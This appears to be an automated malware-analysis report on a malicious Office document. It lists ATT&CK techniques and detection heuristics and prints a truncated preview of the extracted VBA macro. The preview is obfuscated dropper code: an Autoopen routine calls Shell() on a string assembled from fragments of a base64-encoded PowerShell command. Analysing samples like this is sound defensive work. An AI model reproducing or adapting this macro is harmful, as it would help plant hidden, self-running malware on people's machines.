MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The Autoopen macro and a Shell() call within the VBA code indicate that the macro is designed to execute arbitrary commands. The script attempts to construct a command string, likely for downloading and executing a secondary payload, which is a common dropper behavior.
Heuristics 7
-
ClamAV: Doc.Dropper.Agent-6576135-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6576135-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11150 bytes |
SHA-256: c9e2914a08625673da5590f498a8c9aa3d42286b3126c2b24a1d875db1a5a391 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "JEJiMOkwlw" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function UAEGdc() On Error Resume Next PLLUh = Tan(BSHiP _ * Tan(jNOWM * Int(WEYKw * Sqr(38056) / FpoQB + Fix(47641)) / 52620 * Round(24630 / Log(25352 - wbWTn) + 11868 - STCWi)) _ / 15883 + Log(5196)) KnnYz = Tan(Prwci _ * Tan(CFJnq * Int(vSvpo * Sqr(67651) / AscRBa + Fix(64249)) / 72790 * Round(18392 / Log(82801 - noPNhk) + 51543 - EtUMKO)) _ / 60690 + Log(22095)) UAEGdc = sAtLr + Shell(IHGNNUuBBX + Chr(DfYKiz + vbKeyP + VRHzfZm) + aQIksruGT + mtskklTjMNB + CCSrA + VajmBnbEKjn + iBIpsE, 55596 - 55596) kLUzE = Tan(wNmZu _ * Tan(BbsOX * Int(CDilKP * Sqr(93771) / FjjSDW + Fix(28579)) / 39361 * Round(2979 / Log(96300 - mjPTA) + 89481 - jpCSb)) _ / 94558 + Log(73872)) End Function Sub Autoopen() On Error Resume Next dIizA = Tan(CZTQj _ * Tan(WYnhZ * Int(slQmji * Sqr(82006) / iHcnEj + Fix(61194)) / 77994 * Round(85644 / Log(12803 - CzQkKv) + 6933 - aoHBV)) _ / 85897 + Log(63424)) UAEGdc AwqYw = Tan(BWuzj _ * Tan(zohjj * Int(XzcBGr * Sqr(61492) / QLbFG + Fix(89604)) / 44842 * Round(59231 / Log(59639 - Bistwt) + 79220 - OrVlG)) _ / 52929 + Log(40948)) End Sub Attribute VB_Name = "Vjbzszshrpv" Function aQIksruGT() On Error Resume Next tWsDR = Tan(VXBow _ * Tan(NWChE * Int(drKwj * Sqr(52804) / TrEwz + Fix(12592)) / 68338 * Round(48023 / Log(19723 - tFdFO) + 19736 - YHjJE)) _ / 876 + Log(37312)) hjKYw = "owers" + "HeLL " + "-e KAAgA" + "E4ARQB3" + "AC0ATwB" VVsjz = Tan(qRlwSQ _ * Tan(ChMAD * Int(IbawP * Sqr(63969) / YZrIOq + Fix(71025)) / 96420 * Round(58661 / Log(71929 - pMRDos) + 14182 - toWZWJ)) _ / 1439 + Log(84828)) mwZiTEvvnT = "iAGoAZQB" + "DAFQAIABpA" + "E8ALgBzAHQ" + "AUgB" + "lAEEAbQBSAE" + "UAQ" + "QBEAGUAUgAoACA" + "AKAAgAE4ARQB3" + "AC0" + "AT" ZuWcC = Tan(YQZcj _ * Tan(faXwVL * Int(qFmhrT * Sqr(76610) / BzUzN + Fix(97273)) / 50273 * Round(48334 / Log(69369 - OnMsm) + 29438 - XTNNw)) _ / 56608 + Log(1976)) CUMLD = "wB" + "iAGoAZQBDAFQ" + "AIAAgAGkATwAu" + "AEMATwBNAFAA" KBFmMf = Tan(OsXRE _ * Tan(VdFBnh * Int(XizSX * Sqr(34155) / AauCW + Fix(38344)) / 3121 * Round(7298 / Log(94444 - mXjFZ) + 38463 - VKnCq)) _ / 14936 + Log(22598)) pBGihKDKCi = "cgBlA" + "HMAcwBJAG8ATg" + "AuA" + "EQARQBGAEwAQQB" + "UAGUAc" + "wB0AFIARQBhAE0" + "AKABbAFMA" + "WQBzAFQ" wtafD = Tan(OuLInz _ * Tan(vkbRj * Int(OQzBwK * Sqr(54450) / MiRKSi + Fix(84014)) / 49940 * Round(50535 / Log(52106 - thYcY) + 94717 - WBZaLk)) _ / 18746 + Log(43291)) oSjGYmwLjB = "ARQBNAC4Aa" + "QB" + "PAC4ATQBFAG0Ab" + "wByAH" + "kAcwB0AHIAZQBhA" + "G0AXQBbAE" + "MATwBuAFYAZ" + "QByAFQAXQ" vwrcVb = Tan(BQuzVP _ * Tan(VKAtmD * Int(nYEMob * Sqr(45356) / ShAwlw + Fix(52411)) / 66167 * Round(97741 / Log(4824 - rWMiz) + 30562 - YEQLq)) _ / 44044 + Log(35994)) fPwMuMUzwwS = "A6ADoAZgBSAG8" + "ATQBiAEEA" + "cwBlADYANA" + "BzAHQA" + "UgBpAG4A" aQIksruGT = hjKYw + mwZiTEvvnT + CUMLD + pBGihKDKCi + oSjGYmwLjB + fPwMuMUzwwS End Function Function mtskklTjMNB() On Error Resume Next HZnPh = Tan(SPzMz _ * Tan(djubB * Int(ULUauF * Sqr(94372) / CTWGqd + Fix(56394)) / 60854 * Round(78280 / Log(2684 - jVSZGO) + 33637 - qisKo)) _ / 19793 + Log(98052)) MjJzzQjfnLq = "ZwAoAC" + "AAJwBYAFoAQgB" + "kA" + "FQAOABJAHcAR" Gmhfi = Tan(Azwtq _ * Tan(Twzrs * Int(RWCmNL * Sqr(55650) / GCKIh + Fix(93656)) / 84208 * Round(52986 / Log(43425 - HVMRUU) + 51648 - Yviuj)) _ / 1578 + Log(33820)) rrVQLmsFawQ = "gBJAGIALwBTAG" + "kAKw" + "BXAE" + "QAS" + "wBLADA" + "AZwBzAFEAbw" + "BpADQAawBp" + "AG8ATQBhAGgAR" + "QBCAEMA" sczUY = Tan(CfLzm _ * Tan(LtirZD * Int(WTABiL * Sqr(595) / hUMWJr + Fix(50747)) / 8234 * Round(28979 / Log(53824 - VmThF) + 44394 - kBiQqV)) _ / 55478 + Log(32768)) RNVGQRHSnw = "TQBNAF" + "QA" + "RgB" + "kAGQAO" + "ABhA" + "EsAVwA3AH" + "QAMABoADIAMQB" + "JA" + "CsATwA4AFcAUQBT" nrbRJY = Tan(UKzbdw _ * Tan(pPPXiz * Int(muiAa * Sqr(97312) / ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.